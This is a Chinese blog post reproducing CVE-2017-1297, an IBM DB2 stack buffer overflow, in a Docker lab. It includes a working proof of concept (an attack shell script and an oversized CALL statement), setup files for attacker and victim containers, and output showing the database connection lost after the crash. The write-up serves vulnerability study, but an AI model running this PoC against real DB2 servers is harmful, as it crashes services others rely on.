CVE-2017-1297漏洞复现

已于 2024-01-18 19:56:04 修改
阅读量1.4k 收藏 40
点赞数 44
分类专栏: 漏洞复现 文章标签: 安全 db docker
于 2024-01-18 19:51:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43694227/article/details/135682706
版权

CVE-2017-1297漏洞复现

首次发表于个人网站:https://yumlii33.github.io/

参考链接

IBM DB2 9.7/10.1/10.5/11.1 - Command Line Processor Buffer Overflow - Multiple dos Exploit

漏洞说明

IBM DB2 for Linux, UNIX and Windows 9.2, 10.1, 10.5, and 11.1 (includes DB2 Connect Server) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking which could allow a local attacker to execute arbitrary code.

攻击镜像构建

  • exp.sh:

    #!/bin/bash
echo "[+] 正在准备连接目标db2数据库"
echo $1
echo $2
db2 catalog tcpip4 node remotedb remote $1 server $2
db2 catalog database testdb3 as testdb33 at node remotedb
db2 connect to testdb33 user db2inst1 using 123456
echo "[+] 已连接成功目标数据库"
echo "[+] 正在查询目标数据库数据"
# 查询数据
db2 -f select.sql
echo "[+] 正在发送PoC"
# 发送 PoC
db2 -f crash.sql
echo "[+] PoC发送成功"
echo "[+] 再次尝试查询数据库"
db2 -f select.sql

  • select.sql:

    select * from tbl4

  • crash.sql:

    CALL AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;

  • entrypoint.sh:

    #!/bin/bash
cd server && ./db2prereqcheck &&  echo 'ESE' | ./db2_install -b /opt/ibm/db2/V9.7 || echo pass
cd /opt/ibm/db2/V9.7/instance && ./dascrt -u dasusr1  
./db2icrt -u db2inst1 db2inst1 
su - db2inst1 -c "db2start"

su - db2inst1 -c "db2set DB2COMM=TCPIP"
su - db2inst1 -c "db2 update dbm cfg using SVCENAME 60000"
su - db2inst1 -c "db2stop"
su - db2inst1 -c "db2start"

echo "finish"
echo "Remote IP: $REMOTE_IP"
echo "Remote PORT: $REMOTE_PORT"
# STR=$(echo $3 | cut -d "[" -f 2 |cut -d  "]" -f 1 | cut -d "'" -f 2)
# echo $STR
su - db2inst1 -c "cd / && bash /exp.sh $REMOTE_IP $REMOTE_PORT"

tail -f /dev/null

  • Dockerfile:

    FROM centos:7.2.1511

COPY v9.7_linuxx64_server.tar.gz v9.7_linuxx64_server.tar.gz
# COPY sysctl.conf /etc/sysctl.conf


RUN tar -xzvf v9.7_linuxx64_server.tar.gz
RUN rm v9.7_linuxx64_server.tar.gz
RUN yum install -y libstdc++ libstdc++.so.6 libaio


# RUN chmod 644 /etc/sysctl.conf
# RUN sysctl -p 
RUN ipcs -l

RUN groupadd -g 901 db2iadm1 && \
    groupadd -g 902 db2fadm1 && \
    groupadd -g 903 dasadm1  && \
    useradd -g db2iadm1 -u 801 -d /home/db2inst1 -m  db2inst1 && \ 
    useradd -g db2fadm1 -u 802 -d /home/db2fenc1 -m db2fenc1 && \
    useradd -g dasadm1 -u 803 -d /home/dasadm1 -m dasusr1 &&\
    echo 'db2inst1:123456' | chpasswd



# CMD ["tail",'-f','/dev/null']

# RUN cd server && ./db2prereqcheck &&  echo 'ESE' | ./db2_install -b /opt/ibm/db2/V9.7 || echo pass
# RUN cd /opt/ibm/db2/V9.7/instance && ./dascrt -u dasusr1  &&\
#     ./db2icrt -u db2inst1 db2inst1 


# RUN db2 create database KHYX_YS using codeset GBK territory CN
# RUN db2 create database KHYX_YS 
# RUN db2set –all
COPY entrypoint.sh /entrypoint.sh
COPY exp.sh /exp.sh
COPY select.sql /select.sql
COPY crash.sql /crash.sql

RUN chmod +x /entrypoint.sh
RUN chmod +x /exp.sh

ENV REMOTE_IP=${REMOTE_IP}
ENV REMOTE_PORT=${REMOTE_PORT}
ENTRYPOINT ["/entrypoint.sh"]


# CMD ['REMOTE_IP']

# CMD ["tail",'-f','/dev/null']


EXPOSE 60000

  • 镜像构建(获得docker_image_id_1)

    docker build .

被测环境搭建

  • create_table.sql:

    CREATE DATABASE testdb3
connect to testdb3

CREATE TABLE tbl4 (stu_name CHAR(10) NOT NULL PRIMARY KEY)
ALTER TABLE tbl4 ADD COLUMN stu_age CHAR(10)
INSERT INTO tbl4 VALUES ('alice','20')
INSERT INTO tbl4 VALUES ('bob','16')
INSERT INTO tbl4 VALUES ('tom','19')
INSERT INTO tbl4 VALUES ('john','32')
INSERT INTO tbl4 VALUES ('amy','13')
INSERT INTO tbl4 VALUES ('france','56')
INSERT INTO tbl4 VALUES ('frank','41')

SELECT * FROM tbl4

  • entrypoint.sh:

    #!/bin/bash
cd server && ./db2prereqcheck &&  echo 'ESE' | ./db2_install -b /opt/ibm/db2/V9.7 || echo pass
cd /opt/ibm/db2/V9.7/instance && ./dascrt -u dasusr1  
./db2icrt -u db2inst1 db2inst1 

su - db2inst1 -c "db2set DB2COMM=TCPIP"
su - db2inst1 -c "db2 update dbm cfg using SVCENAME 60000"
su - db2inst1 -c "db2stop"
su - db2inst1 -c "db2start"

su - db2inst1 -c "cd / && db2 -f create_table.sql"

  • Dockerfile:

    FROM centos:7.2.1511

COPY v9.7_linuxx64_server.tar.gz v9.7_linuxx64_server.tar.gz
# COPY sysctl.conf /etc/sysctl.conf


RUN tar -xzvf v9.7_linuxx64_server.tar.gz
RUN rm v9.7_linuxx64_server.tar.gz
RUN yum install -y libstdc++ libstdc++.so.6 libaio

RUN ipcs -l

RUN groupadd -g 901 db2iadm1 && \
    groupadd -g 902 db2fadm1 && \
    groupadd -g 903 dasadm1  && \
    useradd -g db2iadm1 -u 801 -d /home/db2inst1 -m  db2inst1 && \ 
    useradd -g db2fadm1 -u 802 -d /home/db2fenc1 -m db2fenc1 && \
    useradd -g dasadm1 -u 803 -d /home/dasadm1 -m dasusr1 &&\
    echo 'db2inst1:123456' | chpasswd

COPY entrypoint.sh /entrypoint.sh
# COPY exp.sh /exp.sh
COPY create_table.sql /create_table.sql
# COPY crash.sql /crash.sql

RUN chmod +x /entrypoint.sh
# RUN chmod +x /exp.sh

# ENV REMOTE_IP=${REMOTE_IP}



ENTRYPOINT ["/entrypoint.sh"]

EXPOSE 60000
# CMD ['REMOTE_IP']

# CMD ["tail",'-f','/dev/null']

  • 镜像构建(获得docker_image_id_2)

    docker build.

被测环境容器启动(比较慢)

docker run -it -d --privileged -p 60000:60000  docker_image_id_2

攻击脚本执行

# REMOTE_IP为被测环境的ip
# REMOTE_PORT为被测环境的端口
# docker_image_id_1 为攻击镜像id

docker run --network host -it -d --privileged -e REMOTE_IP='192.168.33.44' -e REMOTE_PORT='60000' docker_image_id_1

攻击成功效果

……(此处省略n行)……

[+] 已连接成功目标数据库
[+] 正在查询目标数据库数据

STU_NAME   STU_AGE   
---------- ----------
alice      20        
bob        16        
tom        19        
john       32        
amy        13        
france     56        
frank      41        

7 record(s) selected.


[+] 正在发送PoC
[+] PoC发送成功
[+] 再次尝试查询数据库
SQL1024N  A database connection does not exist.  SQLSTATE=08003
froM_C
关注
  • 44
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
[CVE-2017-12615]漏洞
https://www.cnblogs.com/zpchcbd/
05-07 2467
漏洞编号CVE-2017-12615 漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本 环境搭建 docker搭建 ubuntu16.04+docker sudo docker-compose up -d 手动搭建 tomcat7.0.0-7.0.81 环境 然后自己去配置当前目录下的/conf/web.xml 添加如下代码: readonly false 利用...
CVE-2017-12629 xxe漏洞
xinyue9966的博客
03-21 1046
一、实验介绍 1.漏洞介绍 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。 2.影响版本 Apache Solr before 7.1 with Apache Lucene before 7.1 E
CVE-2017-7921漏洞
qq_22132931的博客
05-12 1946
CVE-2017-7921漏洞
CVE-2017-15715漏洞
xiao_he0123的博客
03-28 3508
vulhub通关记录前言Apache HTTPD 换行解析漏洞CVE-2017-15715)通关步骤1.首先先开启环境2.漏洞ActiveMQ Deserialization Vulnerability (CVE-2015-5254)开启环境漏洞总结 前言 Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞变得更加简单,让安全研究者更加专注于漏洞原理本身 Apache HTTPD 换行解析漏洞CVE-
CVE-2017-15715 漏洞
博客
03-24 4398
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页,在2.4.0~2.4.29版本 存在一个解析漏洞,在解析php时,1.php\x0A将按照php后缀进行解析,导致绕过一些服务器的安全 策略。
Office CVE-2017-8570漏洞
weixin_44283446的博客
12-20 2024
Office CVE-2017-8570漏洞说明描述漏洞影响版本环境说明漏洞参考 说明 本文仅供学习使用 描述 2017年7月,微软在例行的阅读补丁中修了多个Microsoft Office漏洞,其中的CVE-2017-8570漏洞为一个逻辑漏洞。网上公布了利用代码,影响范围广泛。该漏洞为Microsoft Office的一个远程代码执行漏洞。其成因是Microsof PowerPoint执行时会初始化“script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而
CVE-2017-17405漏洞
HEAVEN569的博客
02-14 1117
一、漏洞简述 Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。 Net::FTP#get、getbinaryfile、gettextfile、put、putbinaryfile和puttextfile使用Kernel#open打开本地文件。如果localfile参数以管道字符“|”开头,则执行管道字符后面的命令。
Microsoft Office (CVE-2017-11882、CVE-2022-30190) 漏洞
oiadkt的博客
04-23 512
Microsoft Office (CVE-2017-11882、CVE-2022-30190) 漏洞
CVE-2017-12615漏洞
weixin_44831109的博客
03-30 1304
1.靶场172.168.20.176(内网的外网访问不到) 2.使用goby 发8080端口开放以及一个高危漏洞CVE-2017-12615漏洞 3.使用burpsuit抓包 发送給重发器 将get方法改成put方法 上传一个jsp一句话木马 更改发送到右边显示这样说明成功 木马成功上传 4.使用冰蝎 连接密码是冰蝎默认的 root权限 ...
CVE-2017-10271漏洞
qq_36594628的博客
07-27 4888
CVE-2017-10271 一、启动环境 ​ 靶机:ubantu20.04 IP:192.168.3.115 ​ 攻击机:win10 IP:192.168.1.238 ​ 在ubantu 20.04 搭建 Vulhub 环境中已经介绍了怎么启动环境。 二、漏洞信息 ​ WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发漏洞的利用方式为传播挖矿程序。 (一)、漏洞描述 ​ 在了解CVE-2017
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address...
如何安全可控的进行跨区域数据交换,提高数据价值?
文件数据安全交换
04-30 911
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
前端安全:XSS和CSRF攻击的防御策略
最新发布
2301_79507619的博客
05-01 697
**使用HTTP头部**:设置`Content-Security-Policy` (CSP) 响应头可以限制资源(如脚本、图片等)的加载来源,有效阻止外部恶意脚本的执行。- **编码输出**:对输出数据进行HTML编码,确保任何输出到HTML页面的内容都是安全的。- **使用CSRF令牌**:在客户端请求时发送一个随机生成的令牌,服务器进行验证令牌的有效性。- **验证Referer和Origin头部**:通过检查HTTP请求的`Referer`或`Origin`头部来验证请求是否来自合法的源。
网络安全入门 5 天速成教程: WEB 安全渗透攻防技术
baimaozi008的博客
04-30 1634
随着 Web 技术发展越来越成熟,而非 Web 服务越来越少的暴露在互联网上,在互联网安全主要指的是 Web 安全。为了自身不“裸奔”在大数据里,渐渐开始学习 Web 安全,在学习 Web 安全的过程中,发很大一部分知识点都相对零散,如果没有相对清晰 的脉络作为参考,会给学习带来一些不必要的负担。于是之后就把一些知识、想法整理记录下来,最后形成了这份《Web 安全学习笔记》。
撞库攻击是什么,如何进行有效的防护阻止
HoewDec的博客
04-30 1428
黑客通过收集互联网已泄露的用户和密码信息,生成对应的字典表,由于许多用户重使用相同的用户名和密码,攻击者可以使用撞库攻击获得对其他网站上用户帐户未经授权的访问。威胁检测与分析依赖云端强大的基础数据收集系统 ,结合自主研发的多款、累计数十种提取方法的核心情报提取系统 ,快速且自动化的生产高覆盖度、高准确度、上下文丰富的情报数据。为各种不同类型的业务提供独特的价值。据统计,撞库攻击的成功率通常为1%到3%,但动辄数千万甚至上亿的泄露数据,最终成功的攻击可达上万,对于企业和个人来说危害性非常大。
cve-2017-7504漏洞
08-23
您好!对于CVE-2017-7504漏洞,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 2. 搭建相应的环境:您可以在漏洞环境中使用Apache Struts 2漏洞测试框架,例如Metasploit或其他可用的漏洞测试工具。 3. 指定目标URL:使用合适的工具,指定目标URL以进行漏洞利用。通常,您需要提供目标系统上受影响的Struts 2应用程序的URL。 4. 发起攻击:使用漏洞利用工具执行相应的攻击代码。具体的攻击方法取决于您使用的工具和漏洞利用脚本。 请注意,漏洞属于未经授权的活动,可能违反法律法规,因此我们强烈建议仅在合法授权和合规测试范围内进行漏洞。此外,对于未经授权或非法目的使用该漏洞进行攻击是违法行为,且可能导致严重后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值